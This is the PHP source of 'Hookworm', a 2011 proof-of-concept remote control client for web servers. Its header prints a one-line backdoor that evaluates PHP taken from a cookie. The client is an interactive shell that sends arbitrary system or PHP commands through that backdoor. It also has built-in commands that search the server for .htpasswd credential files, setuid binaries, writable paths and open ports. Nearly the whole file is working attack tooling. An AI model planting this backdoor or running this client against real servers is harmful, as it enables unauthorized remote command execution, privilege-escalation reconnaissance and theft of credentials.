<?php
/**
 * Hookworm remote code execution client proof of concept.  
 * 
 * Run with the PHP CLI as follows:
 * 
 * $ php hookworm.php
 * 
 * Hookworm depends on the following code being installed 
 * on the target:
 * 
 * <?php if(isset($_COOKIE['c'])) {eval($_COOKIE['c']); echo $_COOKIE['d'] . $r . $_COOKIE['d'];}?>
 * 
 * The 'c' cookie carries the payload command while the 
 * 'd' cookie holds the delimiter so that the client can 
 * strip away extraneous HTML for display.
 * 
 * Last modified: April 29, 2011
 * 
 * @author Justin C. Klein Keane <justin@madirish.net>
 */
$debug = 0; // set to 1 for debugging output
$version = "1.0";

echo "Hookworm version $version\n";
echo "Enter the IP of the host to connect to:\n";
$host = trim(fgets(STDIN, 256));
echo "Host set to $host\n";
echo "Enter the relative path to the hookworm (ex: /index.php):\n";
$file = trim(fgets(STDIN, 256));
echo "Enter the delimiter you'd like to use (ex: '***'):\n";
$delim = trim(fgets(STDIN, 256));
if ($delim == '') $delim = "***"; // delimiter
echo "Type 'help' for a list of commands.\n\n";
while (1) {
	echo "hookworm> ";
	$command = trim(fgets(STDIN, 256));
	if ($command == 'quit' || $command == 'exit') break;
	if ($command == 'help') { 
		help();
		continue;
	}
	// Turn off error reporting to hide sloppy mistakes
	$send_cmd = 'error_reporting(0);';
	
	if (substr($command,0,4)=='php:') {
		$send_cmd .= '$r=' . substr($command,4) . ';';
	}
	elseif ($command == 'hw:find .htaccess') {
		$send_cmd .= '$r=shell_exec(\'find / -type f -name .htaccess\');';	
	}
	elseif ($command == 'hw:find .htpasswd') {
		$send_cmd .= '$r=shell_exec(\'find / -type f -name .htpasswd\');';	
	}
	elseif ($command == 'hw:find suid') {
		$send_cmd .= '$r=shell_exec(\'find / -type f -perm -04000 -ls\');';	
	}
	elseif (substr($command,0,12)=='hw:find name') {
		$send_cmd .= '$r=shell_exec(\'find / -type f -name "*' . trim(substr($command,13)) .'*"\');';	
	}
	elseif ($command == 'hw:find writable') {
		$send_cmd .= '$r=shell_exec(\'find / -perm -2 -ls\');';	
	}
	elseif ($command == 'hw:show ports') {
		$send_cmd .= '$r=shell_exec(\'netstat -an | grep -i listen\');';	
	}
	else {
		$send_cmd .= '$r=shell_exec(\'' . $command . '\');';	
	}
	
	if ($debug) echo "Sending command:  " . $send_cmd . "\n";
	$send_cmd = urlencode($send_cmd);
	
	$out = "GET $file HTTP/1.1\r\n";
	$out .= "Host: $host\r\n";
	$out .= "Connection: Close\r\n";
	$out .= "Cookie: c=$send_cmd; d=$delim\r\n";
	$out .= "\r\n";
	if (!$fp=fsockopen($host,80, $errno, $errstr, 15))  return false;
	  
	fwrite($fp, $out);
	$str = ""; 
	//read in a string which is the contents of the required file
	while (!feof($fp)) {
		$str.=fgets($fp, 1024);
	}
	fclose($fp);
	if ($debug) echo $str . "\r\n----\r\n";
	
	$output_start = strpos($str,$delim)+strlen($delim);
	$output_end = strpos($str,$delim,$output_start);
	$output = substr($str, $output_start, $output_end-$output_start);
	
	echo $output;
}

function help() {
	global $version;
	echo "Hookworm $version help\n";
	echo "\t[command] forks\t\t commands through shell_exec()\n";
	echo "\tphp:[command]\t\t issues PHP commands\n";
	echo "\thw:find .htaccess\t finds all .htaccess files\n";
	echo "\thw:find .htaccess\t finds all .htpasswd files\n";
	echo "\thw:find suid\t\t finds all set uid files\n";
	echo "\thw:find name [name]\t finds all files with [name] in the filename\n";
	echo "\thw:find writable\t finds all writable files and folders\n";
	echo "\thw:show ports\t\t Show open ports on the machine\n";
}
?>